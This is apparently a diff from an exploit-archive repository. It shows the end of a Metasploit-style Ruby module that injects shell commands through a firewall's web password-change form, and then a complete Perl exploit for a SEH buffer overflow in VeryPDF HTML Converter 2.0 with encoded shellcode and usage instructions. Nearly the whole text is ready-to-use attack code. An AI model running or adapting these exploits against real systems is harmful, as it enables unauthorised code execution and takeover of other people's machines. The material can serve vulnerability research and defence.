sploit = "#{datastore['EFW_PASSWORD']}; #{cmd};"
|
||||||
|
|
||||||
|
post_data = Rex::MIME::Message.new
|
||||||
|
post_data.add_part('change', nil, nil, 'form-data; name="ACTION"')
|
||||||
|
post_data.add_part(datastore['EFW_USERNAME'], nil, nil, 'form-data; name="USERNAME"')
|
||||||
|
post_data.add_part(datastore['EFW_PASSWORD'], nil, nil, 'form-data; name="OLD_PASSWORD"')
|
||||||
|
post_data.add_part(sploit, nil, nil, 'form-data; name="NEW_PASSWORD_1"')
|
||||||
|
post_data.add_part(sploit, nil, nil, 'form-data; name="NEW_PASSWORD_2"')
|
||||||
|
post_data.add_part(' Change password', nil, nil, 'form-data; name="SUBMIT"')
|
||||||
|
|
||||||
|
data = post_data.to_s
|
||||||
|
boundary = post_data.bound
|
||||||
|
|
||||||
|
referer_url =
|
||||||
|
"https://#{datastore['RHOST']}:#{datastore['RPORT']}" +
|
||||||
|
"#{datastore['TARGETURI']}"
|
||||||
|
|
||||||
|
|
||||||
|
res = send_request_cgi(
|
||||||
|
{
|
||||||
|
'method' => 'POST',
|
||||||
|
'uri' => datastore['TARGETURI'],
|
||||||
|
'ctype' => "multipart/form-data; boundary=#{boundary}",
|
||||||
|
'headers' => {
|
||||||
|
'Referer' => referer_url
|
||||||
|
},
|
||||||
|
'data' => data
|
||||||
|
})
|
||||||
|
|
||||||
|
if res
|
||||||
|
if res.code == 401
|
||||||
|
fail_with(Failure::NoAccess,
|
||||||
|
"#{rhost}:#{rport} - Received a 401 HTTP response - " +
|
||||||
|
"specify web admin credentials using the USERNAME " +
|
||||||
|
"and PASSWORD advanced options to target this host.")
|
||||||
|
end
|
||||||
|
if res.code == 404
|
||||||
|
fail_with(Failure::Unreachable,
|
||||||
|
"#{rhost}:#{rport} - Received a 404 HTTP response - " +
|
||||||
|
"your TARGETURI value is most likely not correct")
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
end
|
||||||
|
|
||||||
|
end
|
66
platforms/windows/local/38095.pl
Executable file
66
platforms/windows/local/38095.pl
Executable file
|
@ -0,0 +1,66 @@
|
||||||
|
#*************************************************************************************************************
|
||||||
|
#
|
||||||
|
# Exploit Title: VeryPDF HTML Converter v2.0 SEH/ToLower() Bypass Buffer Overflow
|
||||||
|
# Date: 9-6-2015
|
||||||
|
# Target tested: Windows 7 (x86/x64)
|
||||||
|
# Software Link: http://www.verypdf.com/htmltools/winhtmltools.exe
|
||||||
|
# Exploit Author: Robbie Corley
|
||||||
|
# Contact: c0d3rc0rl3y@gmail.com
|
||||||
|
# Website:
|
||||||
|
# CVE:
|
||||||
|
# Category: Local Exploit
|
||||||
|
#
|
||||||
|
# Description:
|
||||||
|
# The [ADD URL] feature is vulnerable to an SEH based buffer overflow.
|
||||||
|
# This can be exploited by constructing a payload of ascii characters that contain our payload
|
||||||
|
# and pasting it into the textbox. The program's textbox converts ALL pasted data to lowercase so I
|
||||||
|
# took advantage of the wonderful Alpha3 tool to encode the shellcode into a numerical format to bypass the filter.
|
||||||
|
#
|
||||||
|
# I also used a null terminated SEH address to gain universal exploitation across all current Windows OSes.
|
||||||
|
# So, I took a rather unconventional approach and placed the shellcode in the buffer itself since it could
|
||||||
|
# not execute after the buffer (after SEH) due to the null byte cutting off the remaining pieces of the string.
|
||||||
|
#
|
||||||
|
# Instructions:
|
||||||
|
# Run this exploit as-is, open the created 'sploitit.txt' file, copy and paste into the [ADD URL] textbox
|
||||||
|
# Hit [OK] and enjoy your soon-to-follow messagebox!
|
||||||
|
#
|
||||||
|
#**************************************************************************************************************
|
||||||
|
|
||||||
|
# placing shellcode in top of buffer padding since we have a null terminated string
|
||||||
|
$zero = pack("C*", 0xD);
|
||||||
|
my $buff = "\x90" x 2700; #NSEH is at 3704. we start low to give room for everything else.
|
||||||
|
my $seh = "\x05\x25\x40".$zero;
|
||||||
|
$nseh = "\xeb\xe1\x90\x90"; # jump backwards to shellcode ;)
|
||||||
|
$filler="\x90" x 122;
|
||||||
|
|
||||||
|
#0018E924 66:05 9903 ADD AX,399
|
||||||
|
#0018E928 04 29 ADD AX,29
|
||||||
|
#0018E92A 04 03 ADD AX,3
|
||||||
|
#10 bytes
|
||||||
|
$encodersetup="\x66\x05\x99\x03\x04\x24\x04\x10";
|
||||||
|
$encodersetup .= "\x8b\xc8";
|
||||||
|
|
||||||
|
#python ALPHA3.py x86 lowercase ECX --input="c:\shellmsg.bin"
|
||||||
|
#Windows MessageBox contructed using Metasploit & Alpha3
|
||||||
|
#637 bytes
|
||||||
|
$shellcode=
|
||||||
|
"j314d34djq34djk34d1411q11q7j314d34dj234dkmq502dq5o0d15upj98xmfod68kfnen488m56kj4".
|
||||||
|
"0ek53knd00192g0dl428l0okn5503cnk6b5bm844nb4k5x70o0mkoc60l9l03c3fje7embj4k9lx1x9k".
|
||||||
|
"10j2j2ngne63og74ob708do87cm3jxm9o3j05x0k628x50910b8e5049o84e01oxk39d5841k8jej8kk".
|
||||||
|
"nxo4ogo5l07129215f7f3fo0989459kxnb2b78jg5gn8m4l21e6g823x5x680c4b91n0ox1370n0l1l4".
|
||||||
|
"10jfmk941b9f1k09n57g281gk414nb4kle92542994293e1dnf224e7b920g0b7go3735cm87f0d4c8f".
|
||||||
|
"9d1d3c3b24obn8ob498k1d0e7bke846elc507594jb2xjb9e6d3g8b7gl9459819jclb5b9bjg1cn935".
|
||||||
|
"6x7x8x7844oe231809742494ndo43d040cn13fmb43k0611f0952kk3g32l54fkd0b6xm15xjkj3636k".
|
||||||
|
"nb9e1dj2n16e3b9565lk6f2bmb7b5e0c0d29l13ekbk94842kd51n17d327000803223ncm9101gl";
|
||||||
|
|
||||||
|
$smallpads = "\x90" x 347;
|
||||||
|
|
||||||
|
##section 2 | total 10 bytes
|
||||||
|
##Perform a long jump backwards up the stack to reach our payload ;)
|
||||||
|
$jumpcode="\x8B\xC1\x90\x90"; #MOV EAX,ECX
|
||||||
|
$jumpcode .= "\x66\x05\x55\x05"; # ADD AX,555 --> We do AX so we don't have to worry about NULLS ;)
|
||||||
|
$jumpcode .= "\xFF\xe0"; #JMP EAX
|
||||||
|
|
||||||
|
open(myfile,'>sploitit.txt');
|
||||||
|
print myfile $buff.$encodersetup.$shellcode.$smallpads.$jumpcode.$nseh.$seh;
|
||||||
|
close (myfile);
|
Loading…
Add table
Reference in a new issue